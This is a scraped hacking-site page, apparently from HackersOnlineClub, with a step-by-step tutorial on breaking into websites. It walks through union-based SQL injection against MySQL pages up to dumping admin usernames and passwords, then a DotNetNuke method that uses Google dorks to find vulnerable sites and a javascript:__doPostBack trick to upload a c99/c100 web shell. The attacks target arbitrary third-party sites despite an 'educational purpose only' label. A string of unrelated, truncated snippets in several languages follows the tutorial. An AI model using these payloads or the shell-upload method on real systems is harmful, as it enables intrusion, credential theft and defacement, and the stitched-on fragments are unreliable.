HackersOnlineClub HOC Official FB page Donate Us - TopicsExpress

HackersOnlineClub HOC Official FB page Donate Us Home Advance Operating System Advertisement With Us Android Tools Anonymous Surfing BackTrack Tutorial Books And WhitePapers Botnets Bug Bounty Web List Bypass Android Pattern lock Chat with Friends through Command Prompt Clickjacking Computer Forensic Tools And Tricks Cross Site Scripting (XSS) Cryptography Donate Us DOS Attacks Phlashing-PDOS Earn Bitcoins Earn Money Online Email Hacking Ethical Cracking Training Course Online Events Exploits Facebook Tricks Firefox Imp. Addons Forensic Tools Fuzzing Game CheatCodes Google Hacking Hack Facebook Account Hack Instagram Account Hack Instagram Account Hack Victim Computer Hack WhatsApp Account Hack Windows Admin Hackers Types Hacking Tools Heartbleed OpenSSL Tools HOC Tools HoneyPot How To Bypass Smartphone Lock Screen How To Identify Fake Facebook Accounts How To Make Window Genuiene How To Remove Facebook Timeline Information Security Install window XP In 10Min. Internet Guide Intrusion Detection System (IDS) Jailbreak iOS Job Board Keylogger Tutorial Learn TCP/IP LFI & RFI Link Partners MAC Address (Media Access Control) Malware Analysis Metasploit Tutorial Hack Webcam Metasploit Cheatsheet Miscellaneous Tools Mobile Hack Tricks Mobile Hacking Tools Mobile Recharge Free Mobile Stuff LG Mobile Codes Nokia mobile codes Samsung Mobile Codes Multi Yahoo&Gtlk Network Hacking Open Source Code Phishing Attacks Phreaking Proxy Server Recover Deleted Files Reverse Engineering RUN Commands Search Engine Optimization (SEO) Security Projects Security Tools Send Fake Mail Send Fake SMS Sniffing Social Engineering Steganography Hide File In Image Tab Napping Tips & Trickses To Block Websites To Create Your Own Social Network Website Training & Webinar VAPT Tools Virus Types Virus Writing Website Hacking Bypass Web Application Firewalls Website Security Website Security Tools Wi-Fi Network Hacking Windows Hacking YouTube Video Converter Website Hacking Learn How To Hack Websites With Different Techniques.. (EDUCATIONAL PURPOSE ONLY) SQL Injection in MySQL Databases:- SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database. Step 1: When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: site/page=1 or site/id=5 Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a after the number in the url. For example: site/page=1 If the database is vulnerable, the page will spit out a MySQL error such as; Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. Step 2 Now we need to find the number of union columns in the database. We do this using the order by command. We do this by entering order by 1--, order by 2-- and so on until we receive a page error. For example: site/page=1 order by 1-- site/page=1 order by 2-- site/page=1 order by 3-- site/page=1 order by 4-- site/page=1 order by 5-- If we receive another MySQL error here, then that means we have 4 columns. If the site errored on order by 9 then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. Step 3 We now are going to use the union command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, for example: site/page=1 union all select 1,2,3,4-- This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. Step 4 We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: user() database() version() or if these dont work try... @@user @@version @@database For example the url would look like: site/page=1 union all select 1,user(),version(),4-- The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. Step 5 In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- So the url would look like: site/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- Remember the table_name goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. Step 6 In this Step we want to list all the column names in the database, to do this we use the following command: union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- So the url would look like this: site/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. Step 7 Finally we need to dump the data, so say we want to get the username and password fields, from table admin we would use the following command, union all select 1,2,group_concat(username,0x3a,password),4 from admin-- So the url would look like this: site/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- Here the concat command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website Portal Hacking (DNN) Technique:- One more hacking method called Portal Hacking (DNN). This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for hacking a websites.. Here U can use dez two Google Dorks 1- inurl:/portals/0 2- inurl:/tabid/36/language/en-US/Default.aspx You can also modify this google dork according to your need & requirement Here is the exploit Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx Step 1 : google Step 2: Now enter this dork :inurl:/tabid/36/language/en-US/Default.aspx this is a dork to find the Portal Vulnerable sites, use it wisely. Step 3: you will find many sites, Select the site which you are comfortable with. Step 4: For example take this site. abc/Home/tabid/36/Lan...S/Default.aspx Step 5: Now replace /Home/tabid/36/Language/en-US/Default.aspx with this /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx Step 6: You will get a Link Gallary page.So far so good! Step 7: Dont do anything for now,wait for the next step... Step 8: Now replace the URL in the address bar with a Simple Script javascript:__doPostBack(ctlURL$cmdUpload,) Step 9: You will Find the Upload Option Step 10: Select Root Step 11: Upload your package Your Shell c99,c100 , Images, etc After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here. Now Go to main page and refresh. you have seen hacked the website. Done..!! Copyright © 2008-2009 Design & Developed By PRIYANSHU. Site Best viewed in Firefox with 1024x768 screen resolution. Subpages (1): Bypass Web Application Firewalls Comments You do not have permission to add comments. Report Abuse|Print Page|Powered By Google Sites

Nos organisations se sont réunies samedi 6 juillet 2013 dans le

3 of 12… Just finished “Light of the World” today. The

SELLING HAS GOT TO BE THE BEST JOB IN THE WORLD! Here at

you know when there is a dignitary at a function aned the

Friends!Do u know which thing/factor in the world a girl/woman

Rigzin Tromge is an amazing woman and she is coming out with her

Ketika Kaisar Romawi Bertekuk Lutut di depan Khalifah Islam

Best players during Asia Tour Chelsea made it three wins from

SUNTAI DRAMA: Suntai Bite His

Biggest thing consuming me at the moment with this retirement is

Section. 2. The House of Representatives shall be composed of

My Life As A Mother.. BIRTH ORDER OF CHILDREN 1st

EVERYBODY QUICK STOP WHAT YOU ARE DOING IS HER BIRTHDAY. MY RIDE

New Starbucks- so a new Starbucks opened about a month ago and I

San Marino! Tassare la 1° casa (esclusa villa/lusso) ove si abita

🌷MADANI PHOOL🌷 Broken clay pot One day, Shaykh Sayyidunā

6類超強食物 幫免疫力加分！

Spent time today with a 74 year old man who had suffered a bad

Babad Arya Tegeh Kuri Arya Kenceng Tegeh Kuri (bukan Kori) adalah

Justice Design POR-8570-65-LEAF-ABRS Victoria 5-Uplight Chandelier

So, the plan was for Chandra and I to spend a quiet day boating on

Here are some interesting stories for all the

The other day we asked yall what your favorite Job was and

Brand New Samurai LED Watch Price : 550 tk Hotline:

This is the reason why party members and supporters of BN